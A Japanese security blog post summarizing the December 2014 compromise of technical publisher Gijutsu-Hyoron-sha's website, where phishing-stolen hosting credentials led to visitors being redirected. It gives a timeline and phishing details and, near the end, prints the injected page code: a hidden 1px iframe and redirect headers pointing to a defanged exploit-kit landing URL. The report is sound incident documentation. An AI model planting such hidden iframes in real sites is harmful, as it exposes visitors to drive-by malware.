ブログトップ 記事一覧 ログイン 無料ブログ開設

piyolog RSSフィード

2014-12-06

技術評論社のWebサイトが改ざんされた件をまとめてみた

| 18:38 |  技術評論社のWebサイトが改ざんされた件をまとめてみたを含むブックマーク

2014年12月5日11時頃から、技術評論社Webサイトを閲覧すると別のサイトに転送される事象が発生しました。ここではその関連情報をまとめます。

公式発表


技術評論社Twitterアカウントのアナウンス(一部)

タイムライン

日時出来事
12月5日 時期不明さくらインターネットフィッシングサイトについて注意喚起を掲載
12月5日技術評論社さくらインターネットドメインに設置されたフィッシングサイトへ誘導するメールが届く。
12月5日 11時頃技術評論社フィッシングサイトに騙され、認証情報を窃取される。
12月5日 11時10分頃技術評論社Webサイトが停止。
12月5日 その後技術評論社が管理会社へ報告。
12月5日 13時20分頃技術評論社Webサイトが復旧。
12月6日 11時頃技術評論社Webサイトを閲覧すると別のドメインに接続する事象が発生。
12月6日 11時半頃技術評論社Twitterアカウントから接続障害が発生しているとアナウンス。
12月6日 14時頃技術評論社が窃取された同社のサーバーアカウントを取り戻し復旧作業を開始したと報告。
12月6日 15時52分技術評論社が暫定的に復旧したことを報告。
12月6日 19時27分技術評論社が本復旧作業を開始。
12月6日 22時頃技術評論社が完全に復旧したことを報告。
12月8日技術評論社が被害詳細や経緯について報告。

被害対象

発端

12月5日の不正アクセス
  • 技術評論社担当者が新サービスリリースでサーバーに張り付いていたため異変に気付いたことによる。
12月6日の不正アクセス

原因

12月5日の不正アクセス
12月6日の不正アクセス
    • 犯行元と思われるアカウントがgihyo.jpのVPSコントロールパネルの画面を投稿している。
      f:id:Kango:20141206182908p:image:w400
12月5日付でさくらインターネットから不正ログインに関する注意喚起

対応

犯行元と思われるアカウントの関連Tweet

f:id:Kango:20141206182913p:image:w350

f:id:Kango:20141206182912p:image:w350

f:id:Kango:20141206182909p:image:w350

f:id:Kango:20141206182910p:image:w350

フィッシングサイトの詳細

  • SSL対応していた。
  • さくらインターネットドメイン(sakura.ne.jp)上に設置されていた。
  • さくらVPSに登録していた技術評論社のメールアドレスに届いた。
  • 他のサービスでは使用していないメールアドレスであった。
  • ヘッダを確認せずにアクセスをしてせいまった

転送されていた外部のドメインについて

gihyo.jp(11時頃)
  • www.koushin-lawfirm.netのレスポンスコード

cache-control:max-age=0

content-encoding:gzip

content-length:20

content-type:text/html; charset=utf-8

date:Sat, 06 Dec 2014 06:07:17 GMT

expires:Thu, 21 Jul 1977 07:30:00 GMT

last-modified:Sat, 06 Dec 2014 06:07:17 GMT

location:http://www.yahoo.co.jp

pragma:no-cache

server:Apache/2.2.16 (Debian)

status:302 Found

vary:Accept-Encoding

version:HTTP/1.1

x-powered-by:PHP/5.3.3-7+squeeze23

gihyo.jp(13時頃)
  • gihyo.jpのレスポンスコード

Content-Length:399

Content-Type:text/html; charset=iso-8859-1

Date:Sat, 06 Dec 2014 03:48:02 GMT

Location:hxxp://live.livelistingreport.com/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cYWIyYzgzZDgwNTI1MTFjYmQwMDk4ZjFlODM0ODA4ZjI

Server:Apache

www.gihyo.co.jp(13時頃)
  • www.koushin-lawfirm.jp (恒心綜合法律事務所のWebサイト)
  • live.livelistingreport.com (37.200.68.53) ロシア urlQuery VT
  • Iframeタグで埋め込まれていた
  • ロシアURLは「ET CURRENT_EVENTS RIG EK Landing URI Struct」でIDS検知

Date: Sat, 06 Dec 2014 04:25:34 GMT

Server: Apache

Last-Modified: Sat, 06 Dec 2014 04:08:43 GMT

ETag: "38146c-128-509845967b200"

Accept-Ranges: bytes

Content-Length: 296

Connection: close

Content-Type: text/html; charset=UTF-8

<iframe src="hxxp://www.koushin-lawfirm.jp/" style="width:100%; height:100%;"></iframe>

<iframe src="hxxp://live.livelistingreport.com/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cYWIyYzgzZDgwNTI1MTFjYmQwMDk4ZjFlODM0ODA4ZjI" style="width:1px; height:1px; visibility:hidden;"></iframe>

https://twitter.com/kenji_s/status/541086984991965184

更新履歴

  • 2014/12/06 PM 新規作成
  • 2014/12/06 PM 原因について記述内容を修正
  • 2014/12/06 PM お詫び公開に伴う追記
  • 2014/12/08 PM 詳細情報公開に伴う修正、追記